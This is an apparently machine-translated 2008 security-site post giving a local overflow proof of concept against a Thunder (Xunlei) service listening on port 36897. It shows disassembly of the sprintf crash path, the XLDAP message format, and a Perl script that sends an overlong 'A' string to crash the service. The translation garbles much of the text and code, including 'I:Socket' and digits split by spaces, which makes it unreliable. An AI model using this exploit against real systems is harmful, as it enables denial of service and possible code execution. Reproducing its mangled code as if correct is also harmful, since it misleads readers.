Thunder local overflow POC-the exploit-warning-the black bar safety net

ID MYHACK58:62200818999
Type myhack58
Reporter 佚名
Modified 2008-05-08T00:00:00


By:mad Dog[B. C. T]

Previously been in the pass thunder and 0day, the Activex should be almost, but also not neglect, or uninstall it, today the abundance of the initial issuance to a URL, the original pixel a Thunderbolt 0day, see the instructions or remotely! Feel a, look at that vulnerability monitor port C:\>netstat-na|find "3 6 8 9 7" TCP 6 8 9 7 LISTENING

Binding of local IP? It shows that this is not remote, only local. ...... 23132CBE 6 8 B4C61323 push 2313C6B4 ; ASCII "to develop this program specifically" 23132CC3 5 7 push edi 23132CC4 FFD6 call esi 23132CC6 5 9 pop ecx 23132CC7 84C0 test al, al


23132CEF 85FF test edi, edi 23132CF1 7 4 0 2 je short 23132CF5 23132CF3 8BCF mov ecx, edi 23132CF5 B8 D4C61323 mov eax, 2313C6D4 ; ASCII "XLDAP" 23132CFA 5 0 push eax 23132CFB 5 2 push edx 23132CFC 5 1 push ecx 23132CFD 5 0 push eax 23132CFE 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4] 23132D04 6 8 C0C61323 push 2313C6C0 ; ASCII "%s|%s|%s|%s" ......

According to the above can be analyzed out of this port accepts the data format is XLDAP|A|B|XLDAP, A is method, B is a value. Also lazy to see description, The problem is in the develop this program specifically on the method, then the data structure is very simple, the POC is as follows:

!/ usr/bin/perl

use I:Socket;

if ($socket = I:Socket::INET->new(PeerAddr => "",PeerPort => "3 6 8 9 7",Proto => "TCP")) { $exploit = "XLDAP|develop this program specifically|".

("A" x 3 9 7).

("A" x 5 0 0). "|XLDAP";

print $socket $exploit; sleep(1); close($socket); } else { print "Cannot connect to localhost:3 6 8 9 7 port\n"; }

If written in python exp while you will be very depressed, because the py will always give even more than a wrap, even to use[:-1]this method is also useless, depressed, it is not clear is the process of passing or print, who knows what is the reason? 23132D09 5 0 push eax 23132D0A FF15 54E51323 call dword ptr [<&amp; applications like. sprintf>] ; crash 23132D10 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4] Is in the implementation of this step in the sprintf function to copy the time lead to crash.